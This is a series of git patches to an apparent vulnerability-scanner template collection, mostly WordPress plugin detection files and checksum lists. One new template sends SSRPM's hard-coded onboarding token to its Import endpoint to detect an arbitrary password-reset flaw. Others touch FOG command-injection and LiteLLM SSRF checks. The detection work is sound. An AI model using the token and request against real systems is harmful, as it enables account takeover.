--- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206293a5ae07c2f34de5b778ca923f6f069c37f72658acebbc986569cb4e905e5b022067675de54bbbe7508f8c9f7247d548cc49a0c6f1ad5c3cd736d465f6534c8c98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 24addb9fc2..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b321c4cf27073f13fb192e1e51275995cd03e25f9778d83b7409cc2c76c4d9db0220104d83a1fb962f0446ee1763b554db12f24940415cbed28ca287df7d64d232d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index c5c93eb0df..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206d36f35f1ffe464e71baa537420f9e969018bb78035b3abcb2d6776e4b017930022053db4c1152ffa5076b3e59668f319e339105c1f5d5c804f6b14490fd25b511e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 3c3943d302..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e9417c1b73f487cef96aa956b0259bc65887de7830482260327c7ccc10c2c3f02202d79b72e4c511ba64c96304bd7293404f388d95c783de0e84927be470122eb07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index bcb676d9c1..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b2ee5ddb0651d437befea6f16257bcc6d77c0564f88e620912f79232e4ed27d8022100d364de1854092d690a3419498e561490bec6de52f97c6e58934d8bd3c17440e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 68afed5f5e..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009fd02aad3b368c87e9ccf55d3ba6ee955952413d812fe68b898fb83f03dfb2c60221009a7712f32559d0859b0e02844b099c463bec50e167dcc7a69d3770a73ce53ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 721745bfd9..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022077086134ce3153be67c96aa81872c10e9d3fad3ab1466cb4bad5d43ebb84ffc002210091d7a76695f15883e566fec85b8ac0fe430b34741b436a9e9ebe5f09be90acdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 957fea41d4..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d7e9eb8d16ba13b75f0cca25d1675d7e64a71f066aa9e8225dc756f5049e4678022100cad2f27720266a1bbc37aeb75e85d7d80065c145ade53ea95ad3a68be2835649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 742993556584537b244d5863b1776ded3ed279c0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 25 Jul 2024 09:54:01 +0530 Subject: [PATCH 1607/1841] Create ssrpm-arbitrary-password-reset.yaml --- .../ssrpm-arbitrary-password-reset.yaml | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/misconfiguration/ssrpm-arbitrary-password-reset.yaml diff --git a/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml b/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml new file mode 100644 index 0000000000..9de29e84f6 --- /dev/null +++ b/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml @@ -0,0 +1,51 @@ +id: ssrpm-arbitrary-password-reset + +info: + name: SSRPM - Arbitary Password Reset on Default Client Interface Installation + author: vince-isec + severity: high + description: | + The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account. + remediation: Set a new and random value to the OnboardingToken setting. Install the new version of SSRPM and its web interface. + reference: + - https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation + metadata: + shodan-query: http.favicon.hash:-916902413 + max-request: 1 + verified: true + tags: ssrpm,intrusive + +variables: + string: "{{to_lower(rand_text_alpha(5))}}" + +http: + - raw: + - | + POST /Onboarding/Import HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action={{string}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"ErrorCode":-55' + - '"Success":false' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - string From c7b33cefd62b24922a20ae5d72b1f58fc5494299 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 25 Jul 2024 11:58:42 +0530 Subject: [PATCH 1608/1841] minor-update --- http/cves/2024/CVE-2024-39914.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-39914.yaml b/http/cves/2024/CVE-2024-39914.yaml index e37daae58f..baae0d8e9f 100644 --- a/http/cves/2024/CVE-2024-39914.yaml +++ b/http/cves/2024/CVE-2024-39914.yaml @@ -5,7 +5,7 @@ info: author: securityforeveryone severity: critical description: | - FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php. This vulnerability is fixed in 1.5.10.34. + FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php. remediation: Fixed in 1.5.10.34 reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-39914 @@ -24,6 +24,7 @@ info: product: fogproject fofa-query: icon_hash="-1952619005" tags: cve,cve2024,rce,fog + variables: filename: "{{to_lower(rand_text_alpha(12))}}" num: "{{rand_int(1000, 9999)}}" @@ -44,7 +45,7 @@ http: dsl: - 'contains_all(body,"No HTML files!","HTMLDOC")' - 'contains(content_type, "application/pdf")' - - status_code == 200 + - 'status_code == 200' condition: and internal: true @@ -58,5 +59,5 @@ http: dsl: - 'contains(body,"{{md5(num)}}")' - 'contains(content_type, "text/html")' - - status_code == 200 + - 'status_code == 200' condition: and From ec0c76dd96930bf96ac1f2e5efc855e5439347cf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Jul 2024 14:14:35 +0530 Subject: [PATCH 1609/1841] Update CVE-2024-6587.yaml --- http/cves/2024/CVE-2024-6587.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-6587.yaml b/http/cves/2024/CVE-2024-6587.yaml index 6732aa8492..35e2b4a898 100644 --- a/http/cves/2024/CVE-2024-6587.yaml +++ b/http/cves/2024/CVE-2024-6587.yaml @@ -1,11 +1,14 @@ id: CVE-2024-6587 info: - name: LiteLLM Blind - SSRF Exposes OpenAI API Keys + name: LiteLLM - Server-Side Request Forgery author: pdresearch,iamnoooob,rootxharsh,lambdasawa severity: high + description: | + LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys. reference: - https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587 metadata: verified: true max-request: 1 From 1dc10bb5711ffdab276cf68c1d23dd66faf289c7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Jul 2024 14:16:42 +0530 Subject: [PATCH 1610/1841] Update CVE-2024-37843.yaml --- http/cves/2024/CVE-2024-37843.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-37843.yaml b/http/cves/2024/CVE-2024-37843.yaml index 6597faf190..a51314b770 100644 --- a/http/cves/2024/CVE-2024-37843.yaml +++ b/http/cves/2024/CVE-2024-37843.yaml @@ -50,7 +50,6 @@ http: part: body words: - "General error: 1105 XPATH syntax error: '\\n{{matcher}}" - condition: and - type: word part: content_type From e0e6c973fec5dd50cb2673ae0ca864c533de0dc1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 25 Jul 2024 08:47:39 +0000 Subject: [PATCH 1611/1841] Auto Generated New Template Addition List [Thu Jul 25 08:47:39 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3efce6c0fa..10a830a263 100644 --- a/.new-additions +++ b/.new-additions @@ -22,6 +22,7 @@ http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-4885.yaml http/cves/2024/CVE-2024-5217.yaml http/cves/2024/CVE-2024-6289.yaml +http/cves/2024/CVE-2024-6587.yaml http/cves/2024/CVE-2024-6646.yaml http/default-logins/deluge/deluge-default-login.yaml http/default-logins/gitblit/gitblit-default-login.yaml From 5fe3cd0da1e465b2a6b0ac715fc085ce21e9eba6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Jul 2024 08:47:48 +0000 Subject: [PATCH 1612/1841] Auto Generated Templates Checksum [Thu Jul 25 08:47:48 UTC 2024] :robot: --- templates-checksum.txt | 421 +++++++++++++++++++++-------------------- 1 file changed, 211 insertions(+), 210 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 638cafeea0..3ccb2e5a18 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -788,7 +788,7 @@ helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993f helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 helpers/wordpress/plugins/elementor.txt:77bbdb08c8386b1db4a688e2f9a96dd897ebc11f -helpers/wordpress/plugins/elementskit-lite.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b +helpers/wordpress/plugins/elementskit-lite.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:778d773431944dd657af2fde3406d17be92f9cfe @@ -807,12 +807,12 @@ helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d8 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b9236ecbf27032a6e5d49e873bc21600f0dab73c helpers/wordpress/plugins/google-analytics-for-wordpress.txt:51e5b4744f672fbc75ac2043bb18ffd8d1d563c3 -helpers/wordpress/plugins/google-listings-and-ads.txt:cef8b08512cec8f1ab07ed0f568d56f767ca88fa +helpers/wordpress/plugins/google-listings-and-ads.txt:67c391fdae5d34abde64a1732ca064007569702b helpers/wordpress/plugins/google-site-kit.txt:3fc4f3215f2c02622f980d28a4791bcc6857a95e helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/gutenberg.txt:c0b7132c131b0bc84961d92e38abb3eb41c6eb80 -helpers/wordpress/plugins/happy-elementor-addons.txt:d33f1fbbd8e02405d75783dfb145509ee6f51975 +helpers/wordpress/plugins/happy-elementor-addons.txt:e8acad09c835eb3f06d4dfd19f6a58e6bdb0b839 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d helpers/wordpress/plugins/header-footer-elementor.txt:7a2aa38dbae06f99122c345cced2a9e98d1c22bb @@ -820,7 +820,7 @@ helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 -helpers/wordpress/plugins/hostinger.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 +helpers/wordpress/plugins/hostinger.txt:9d58b49dc32ab6a8591bb2ce2c9a3a4748e7f41d helpers/wordpress/plugins/image-optimization.txt:a9ec402f06cdb367cb4ecd9d221265dbc42431cf helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 @@ -837,7 +837,7 @@ helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4a68a369b09b39005e13 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:03c10c50990743199cc887aaacd3f88a0a0a026e helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 -helpers/wordpress/plugins/loginizer.txt:83057b5c2ba4158be4c360919fba39e92c0cd3ca +helpers/wordpress/plugins/loginizer.txt:601d73df964f0268deb6426df6184fb9d6422d1e helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:6f8941ad5d1dfeb1e4d4a276b9ad1dbce8a7cc0d @@ -869,7 +869,7 @@ helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d helpers/wordpress/plugins/post-smtp.txt:aecdd619817528f6e7764e982d8df1aafa8a7175 -helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d +helpers/wordpress/plugins/post-types-order.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb helpers/wordpress/plugins/premium-addons-for-elementor.txt:7db99b25d0e8a75cbf61dc7a01d2b96a266ef77b helpers/wordpress/plugins/pretty-link.txt:bd97de79166e7cff400d017959304a14efc7d502 helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec @@ -879,7 +879,7 @@ helpers/wordpress/plugins/redux-framework.txt:dfd43a95dc2d1f037030918b6e7e05f995 helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 helpers/wordpress/plugins/royal-elementor-addons.txt:2c41dc2f1e32157c60aaaa5ee56094386d5c4194 helpers/wordpress/plugins/safe-svg.txt:5da596d45f9d6516efc24f110a7c87475a984016 -helpers/wordpress/plugins/seo-by-rank-math.txt:85bea03724452599fd9bc595e166c423d5268bae +helpers/wordpress/plugins/seo-by-rank-math.txt:cdcb03d225c2988be05a11790f05f0e9c2751925 helpers/wordpress/plugins/sg-cachepress.txt:bdca50b5cb1feb03950b48f4419acb02a57783cb helpers/wordpress/plugins/sg-security.txt:29cd3f50fdf56b43132cb011be27e5a2567b76ae helpers/wordpress/plugins/shortcodes-ultimate.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 @@ -900,7 +900,7 @@ helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23 helpers/wordpress/plugins/tablepress.txt:98a16af997b52cb888232ab5d79a527b0716561c helpers/wordpress/plugins/taxonomy-terms-order.txt:d176141136f1fe969aeca56eb98e3734f24199ae helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/the-events-calendar.txt:056a2f3ea154b15b7198157705ee170cc88da924 +helpers/wordpress/plugins/the-events-calendar.txt:feefc741fbf96de5f08ce123f923cddfcab86481 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa @@ -3502,7 +3502,7 @@ http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac -http/cves/2024/CVE-2024-4295.yaml:2fd73db13aa3bccef97bf8620bda8ef53846272c +http/cves/2024/CVE-2024-4295.yaml:7c3e58627bc8d2cfbeba41d4e5b02805b06aac35 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a @@ -3520,6 +3520,7 @@ http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 +http/cves/2024/CVE-2024-6587.yaml:41f032f7fdea0ab85006037157cde723104631f4 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -7318,230 +7319,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:0e29e912933b8e8dd3815f15a29612b4fea5b7f0 -http/technologies/wordpress/plugins/add-to-any.yaml:1cb1afe7de1bbd97bbad9a9bce2af88eaa34eafc -http/technologies/wordpress/plugins/admin-menu-editor.yaml:91d184098aa33b08747e8b1785c39ea7a244c8ee +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:8782581a7aa8ecbcfaa6616ae05d22b618fe8d04 -http/technologies/wordpress/plugins/akismet.yaml:baffbc71ed5546d7f309b79a3617cbed0b3b3975 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:61a71748cdfd2f04913b6d3ec0490343bfd69889 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:05954ea2468467568fca5cbeb8fd61337272aa15 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:fc34c96de9e84156ce6824bafa9bb58241d1a341 -http/technologies/wordpress/plugins/amp.yaml:09d633f2b3b8994415107928b0cabe74f62fe8bc -http/technologies/wordpress/plugins/antispam-bee.yaml:1fd2d8acd0d5f970fd8ff1081f10e8ebcbfad7b3 -http/technologies/wordpress/plugins/astra-sites.yaml:a44f0edf657625fba0084116630f86c505e2c2a1 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:a1d5ae6e8e8f35929e6bdfe7c55e4ca4b1894901 -http/technologies/wordpress/plugins/backwpup.yaml:463a7cf6a9944baf51d47e9db340768a6162ac7d -http/technologies/wordpress/plugins/better-search-replace.yaml:1a55b42a11011e08c85a8ebddfd97b2794190128 -http/technologies/wordpress/plugins/better-wp-security.yaml:48e8b89e241ed48abb39e93cef05579ee149b25d -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:03f59b92e333ab1c0ac2c8a299caf2c76d0934dc -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:8dbd6290313a07d191199b7b594afb60e492b77b -http/technologies/wordpress/plugins/breeze.yaml:8cb028df4a934a19c0e0cdea335f5460d38c2918 -http/technologies/wordpress/plugins/broken-link-checker.yaml:78faa62e5fd2fe7f9e751022928352dd14447709 -http/technologies/wordpress/plugins/chaty.yaml:d7908b7921c42b511498596c5f692de0d4d10d7a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:b4bdbb8e75ca509358ae840ff67af424bb16d6f2 -http/technologies/wordpress/plugins/classic-editor.yaml:aa0a92b7d37cfceafbae202b8fd2a2a89b6a954a -http/technologies/wordpress/plugins/classic-widgets.yaml:e4842012f7f15772cf44fea9877d3db5c4e99fba -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:73a611bb2c741fe0c8a410f0212928aa228db118 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:906213a4b0c8b710d9a7985a496cd0db666d26f1 -http/technologies/wordpress/plugins/coblocks.yaml:031264bf19ca70eb58afa97d3b180c06aa80771c -http/technologies/wordpress/plugins/code-snippets.yaml:5f3922fdc9b54d99e9bab33427e2ad8f01635955 -http/technologies/wordpress/plugins/coming-soon.yaml:4ac76df4e336c3ba21d658416628430107538d8b -http/technologies/wordpress/plugins/complianz-gdpr.yaml:0d6a406d16368278480420824d9ebb45b828415f -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:ca68ddd636ef80f97e4233d6e255c555f65da6bd -http/technologies/wordpress/plugins/contact-form-7.yaml:2232d2757ec465fbef216e5aa2d43c7c03af34fb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:d11c4764e8687865fc836ff82390e59c68b6bca3 -http/technologies/wordpress/plugins/cookie-law-info.yaml:69976fd260670c1bd5fd78b7e232d8061d5920d4 -http/technologies/wordpress/plugins/cookie-notice.yaml:5b56bcd8c6cfab9d5f807693a474705e7b042c03 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:bb6d9674a56ac25af5b45b0935d59e0f33bc4415 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:9baf0e04863ba2d7f7e973999ced390dfe26d0eb -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:d89199efb21309f0cbcec5bd1a1343a86185cbff -http/technologies/wordpress/plugins/custom-css-js.yaml:6af37d0b8070430cd989b66b1ec8a927130fd693 -http/technologies/wordpress/plugins/custom-fonts.yaml:dcae6566dd00f01def89961a5cff9d6eed350b9c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:c476d62b4bdbd0eba9037e89a9bd156c19950155 -http/technologies/wordpress/plugins/disable-comments.yaml:87da1801b3ad736121ca5b6c6b5d62c28bde9c9e -http/technologies/wordpress/plugins/disable-gutenberg.yaml:b0455a3829fb689833f3028cb06120e4baa5243c -http/technologies/wordpress/plugins/duplicate-page.yaml:7dc1a8e71fe4e76a930da266f9ee0e55ff2c0d41 -http/technologies/wordpress/plugins/duplicate-post.yaml:52fa1b9e4a1e4fe33fec480961392a8409ce3390 -http/technologies/wordpress/plugins/duplicator.yaml:5218b2348dcc730d2cd46b0d9a58f120b781c3ed -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:8d6783db06d19f9ef5ce436a3598af7c6370b796 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b 